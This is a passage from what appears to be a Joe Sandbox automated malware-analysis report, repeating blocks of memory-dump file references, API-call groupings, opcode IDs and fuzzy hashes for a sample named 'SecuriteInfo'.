                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: f64c13a9f908a028e51b18ebd4ed0853319eeb0de48e00a636fe6786f8989f21
                            • Instruction ID: 61330648939a4f79686b05567e87844c7932dfaa2624eb7af3e45040dfe1c113
                            • Opcode Fuzzy Hash: f64c13a9f908a028e51b18ebd4ed0853319eeb0de48e00a636fe6786f8989f21
                            • Instruction Fuzzy Hash: 71914D32205B4486FB6B8B27E8947DA77A1F74DBE4F540116EB9A876F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: fa35745a4d915b7886617b8b8f2d11392feb1a0ccfcdb20b73eed9ed054344e4
                            • Instruction ID: e5812014f58731e019c9ee7f1c6629cd9901fea5420477f340f9f082ce106b6d
                            • Opcode Fuzzy Hash: fa35745a4d915b7886617b8b8f2d11392feb1a0ccfcdb20b73eed9ed054344e4
                            • Instruction Fuzzy Hash: 88916032205B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 2b20c7cae8bca3efd0fe799d90746c646fa0deaadd6aa940801d9b33416e995b
                            • Instruction ID: 3fa8b31a87e5565adf0905dcab55f2246f4db6b2bec408604ca280105fbf64b4
                            • Opcode Fuzzy Hash: 2b20c7cae8bca3efd0fe799d90746c646fa0deaadd6aa940801d9b33416e995b
                            • Instruction Fuzzy Hash: 29915F3220574486FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseDirectoryGlobalMessagePeekRemoveUnlock
                            • String ID:
                            • API String ID: 1863380684-0
                            • Opcode ID: 509d3cba740121e829a0ce86cdef20337e14043b5d3af8e03be8822022b6abc5
                            • Instruction ID: b8c3f1790a5916fed46c5c34c2b96125753e5239c5fe4c92f5a3329814769ce5
                            • Opcode Fuzzy Hash: 509d3cba740121e829a0ce86cdef20337e14043b5d3af8e03be8822022b6abc5
                            • Instruction Fuzzy Hash: FF916E32605B4086FB6B8B27E8847EA37A1F74DBE4F540116EB59876F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: e4afd273397322c90fa9096e374a8c4fd22e67a2f77cf836b1652ea9f372fdae
                            • Instruction ID: d51d4333bc6466b34f03d783c8c2bff1664047f6f4ebd5682177a953c9e01a2e
                            • Opcode Fuzzy Hash: e4afd273397322c90fa9096e374a8c4fd22e67a2f77cf836b1652ea9f372fdae
                            • Instruction Fuzzy Hash: B5916F31205B4086FB6B8B27E8947EA27A2F74DBE4F540116FB5947AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseCreateGlobalInitializeInstanceKeyboardLayoutMessagePeekUnlock
                            • String ID:
                            • API String ID: 1422310799-0
                            • Opcode ID: 308101f22d18f94e826bce899adcc12ccd8010a2e8a29c9bcfe24b1f1cb16a7d
                            • Instruction ID: 1d400bd56753181d91fa23a51b216ebaddc4cd4cac14e01c26c92a9fc4198a3f
                            • Opcode Fuzzy Hash: 308101f22d18f94e826bce899adcc12ccd8010a2e8a29c9bcfe24b1f1cb16a7d
                            • Instruction Fuzzy Hash: D1915036205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB99477F5DB38C880C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 3b7a8cb2c9515a72916180c313a1a33d57c613ad8a7729aa1562d9e4899ec96a
                            • Instruction ID: d23fe9194b1ad5620ed5b926ec11e1d47ac4c8c96d028aadbe94ee7a6ffff12b
                            • Opcode Fuzzy Hash: 3b7a8cb2c9515a72916180c313a1a33d57c613ad8a7729aa1562d9e4899ec96a
                            • Instruction Fuzzy Hash: 7C917F32605B4086FB6B8B27A8547EA27A1F74DBD4F540116FB5A476F5CB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 43ece1a9e8a3933a5102030c765bc4d0474b4afc7521a936d5cbd370457117ab
                            • Instruction ID: f5d04d1fb2c22407358d1b2d7fb9343a3eddeac6ddc5893270cb4273840c77f5
                            • Opcode Fuzzy Hash: 43ece1a9e8a3933a5102030c765bc4d0474b4afc7521a936d5cbd370457117ab
                            • Instruction Fuzzy Hash: EB915F32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB99877F5DB38C880C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 9d13c5e1ea52bd57a754456badb11e2a6f2aefdeb21774800347278e81986a58
                            • Instruction ID: e16451101d427e2d695526564ad1aa1ecf36d372c0451c50b4d90b5a8012d29b
                            • Opcode Fuzzy Hash: 9d13c5e1ea52bd57a754456badb11e2a6f2aefdeb21774800347278e81986a58
                            • Instruction Fuzzy Hash: CE918132205B4486FB6B8B27E8447EA77A1F74DBE4F550116EB99476F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTickWindow$ClipboardCloseForegroundGlobalIconicMessagePeekShowUnlockVisible
                            • String ID:
                            • API String ID: 1891409732-0
                            • Opcode ID: 13ba0e176eff2c8a2816fe5779156a634d804cd99b8ef06833ea4aafec7956d0
                            • Instruction ID: b0505203bde2e21c8cce81d3b0088850f4be2d77646577137417106c70cbdafd
                            • Opcode Fuzzy Hash: 13ba0e176eff2c8a2816fe5779156a634d804cd99b8ef06833ea4aafec7956d0
                            • Instruction Fuzzy Hash: CA914D32605B4486FB6B8B27E8947EA37A1F74DBE4F540116EB5947AF5CB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Window$ClipboardCloseGlobalMessageMovePeekRectUnlock
                            • String ID:
                            • API String ID: 1284534901-0
                            • Opcode ID: 02cefdc42461796bf07c2677d7a2c160d10b9feb34cd448a763ff07ddb0cb7d6
                            • Instruction ID: b64099fbff93db826dfc9e1528172be6f321e5e5951f2af3455f5242e006f3f0
                            • Opcode Fuzzy Hash: 02cefdc42461796bf07c2677d7a2c160d10b9feb34cd448a763ff07ddb0cb7d6
                            • Instruction Fuzzy Hash: 7B916D32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB9987BF5DB38C880C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 47a1607b006f293736b00dab3a60f12c09ce661de30d11ee3532dd6d38482a6b
                            • Instruction ID: 04623d159412e4fc5c6a168e657707332d605080e212b0b4981d6cb80f5881aa
                            • Opcode Fuzzy Hash: 47a1607b006f293736b00dab3a60f12c09ce661de30d11ee3532dd6d38482a6b
                            • Instruction Fuzzy Hash: CD915F35205B4086EB6B9B27E8943EA3791F74DBE4F140116FB59876F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 5c9c2b72be51b70aa27deec8cc23665ab81ed213e6e4c4cd2971b508e5dcec5e
                            • Instruction ID: 4c04fdc7165fda112c5298acd9d59ca972770abd1ef97255e42ea5343d5fc0e4
                            • Opcode Fuzzy Hash: 5c9c2b72be51b70aa27deec8cc23665ab81ed213e6e4c4cd2971b508e5dcec5e
                            • Instruction Fuzzy Hash: C7915F32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB99477F5DB38C881C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 4152efedcb160e23dfc9b02a314d1729c36b4b2acddb40351a98deb78685ef44
                            • Instruction ID: 3f6e0c0046a54807aa305b99dc74e4cc9ef4701e07b4e1d602521b0ca4355402
                            • Opcode Fuzzy Hash: 4152efedcb160e23dfc9b02a314d1729c36b4b2acddb40351a98deb78685ef44
                            • Instruction Fuzzy Hash: 01915E32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB9987BF5DB38C880C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64wcsncpy
                            • String ID:
                            • API String ID: 2569467992-0
                            • Opcode ID: f87ec481a2074ef4badbb2acf71ec428c0f87579ce38ebe04a87a760b0091681
                            • Instruction ID: 310da68816022d2f395a8cb8249e363fa1111ffd77674560e673ced1c4c78274
                            • Opcode Fuzzy Hash: f87ec481a2074ef4badbb2acf71ec428c0f87579ce38ebe04a87a760b0091681
                            • Instruction Fuzzy Hash: 9B915F32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB99877F5DB38C880C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 870826d31740a98d6209a327a95b7040bd5ed271b5c8ac1c9d8e488afb417c82
                            • Instruction ID: ce1a90305023dc823634cd6aa1da2106542fd793ec59f746b14a54ac69ba6d57
                            • Opcode Fuzzy Hash: 870826d31740a98d6209a327a95b7040bd5ed271b5c8ac1c9d8e488afb417c82
                            • Instruction Fuzzy Hash: D1918F32205B4486FB6B8B27E8847EA37A2F74DBE4F544116EB5947AF5DB38C880C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 086ffd289459504c26191976d66d6c867d14c9cc80c8189c758c1c19e2efc38b
                            • Instruction ID: 7e30cef1d357f4873b67dbbd1a9af4356abf32d0168d450543e48631e796ea04
                            • Opcode Fuzzy Hash: 086ffd289459504c26191976d66d6c867d14c9cc80c8189c758c1c19e2efc38b
                            • Instruction Fuzzy Hash: 67917F32205B4486FB6B8B27E8847EA77A1F74DBE4F140116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
